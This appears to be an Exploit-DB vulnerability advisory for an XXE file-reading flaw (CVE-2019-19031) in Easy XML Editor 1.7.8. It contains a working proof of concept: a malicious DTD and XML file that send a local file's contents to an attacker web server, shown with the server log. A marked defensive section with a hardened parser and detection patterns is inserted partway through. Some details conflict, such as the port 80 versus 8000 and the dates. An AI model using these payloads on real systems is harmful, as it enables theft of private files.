Easy XML Editor 1.7.8 – XML External Entity Injection

  • Author: Javier Olmedo
  • Date: 2020-01-20
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/47945/
# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-21
# Vendor: Richard Wuerflein
# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
# Affected Version: 1.7.8 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19031
# References:
# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/

# 1. Technical Description
# Easy XML Editor version 1.7.8 and before is affected by an XML External Entity Injection vulnerability
# triggered by opening a malicious XML file. This allows a malicious user to read arbitrary files.

# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.

python -m SimpleHTTPServer 80

# 2.2 Upload the payload.dtd file to your web server.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;

# 2.3 Create a SECRET.TXT file with any content on the desktop.

# 2.4 Open poc.xml

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 2.5 Your web server will receive a request with the contents of the secret.txt file.

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
    
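The defensive counterpart to the PoC above, added here as an example and not part of the advisory or of Easy XML Editor itself: a Python 3 parser built on the standard library's pyexpat that refuses the mechanisms the PoC relies on (a DOCTYPE, parameter entities such as `%dtd;`, and any external entity resolution), plus a small static triage function a file scanner or mail gateway could run before any parser touches the document. The names `parse_untrusted_xml`, `xxe_indicators` and `is_blocked` are mine; `POC_XML` is the advisory's poc.xml verbatim, and `BENIGN_XML` is a constructed control input.

```python
"""Defender-side handling of XXE input such as the poc.xml in the advisory.

Added example, not from the advisory and not vendor code.
Uses only the Python standard library (pyexpat + re).
"""
import re
import xml.parsers.expat as expat


class ExternalEntityRejected(ValueError):
    """Raised when untrusted XML declares a DOCTYPE or tries to pull an external entity."""


def parse_untrusted_xml(data: bytes) -> list:
    """Parse XML from an untrusted source and return the element names seen, in order.

    Hardening applied, in order of effect:
      * parameter entities (the %dtd; / %file; mechanism in the PoC) are never
        expanded, so a remote DTD is never fetched;
      * any DOCTYPE at all is rejected up front, since files an editor receives
        from third parties rarely need one;
      * an external entity reference that somehow survives is refused instead
        of being resolved to a file:// or http:// URL.
    """
    elements = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised inside a pyexpat handler propagate out of Parse().
        raise ExternalEntityRejected(f"DOCTYPE '{name}' not allowed in untrusted XML")

    def on_external_ref(context, base, sysid, pubid):
        raise ExternalEntityRejected(f"external entity {sysid!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)
    return elements


def is_blocked(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except ExternalEntityRejected:
        return True
    return False


# Static indicators that can be flagged without parsing (file share scan, gateway, SIEM rule).
_INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE\b", re.I),
    "external-entity-declaration": re.compile(
        rb"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I),
    "parameter-entity-reference": re.compile(rb"%[\w.-]+;"),
}


def xxe_indicators(data: bytes) -> list:
    """Return the names of the XXE indicators present in the raw document bytes."""
    return [name for name, rx in _INDICATORS.items() if rx.search(data)]


# poc.xml exactly as published in the advisory above (backslashes doubled for the bytes literal).
POC_XML = b"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\\Users\\<USER>\\Desktop\\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

# Constructed control input: an ordinary document with no DOCTYPE.
BENIGN_XML = b'<?xml version="1.0"?><root><child>hello</child></root>'


if __name__ == "__main__":
    print("indicators in poc.xml:", xxe_indicators(POC_XML))
    print("poc.xml blocked:", is_blocked(POC_XML))
    print("benign elements:", parse_untrusted_xml(BENIGN_XML))
```

Rejecting every DOCTYPE is the simplest rule and the one most parsers' "secure processing" modes also expose; if an application genuinely needs internal DTDs, keep `XML_PARAM_ENTITY_PARSING_NEVER` and the `ExternalEntityRefHandler` refusal and drop only the DOCTYPE check, since those two settings alone are what stop both the remote `payload.dtd` fetch and the `file:///` read in this PoC.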
# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure

# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo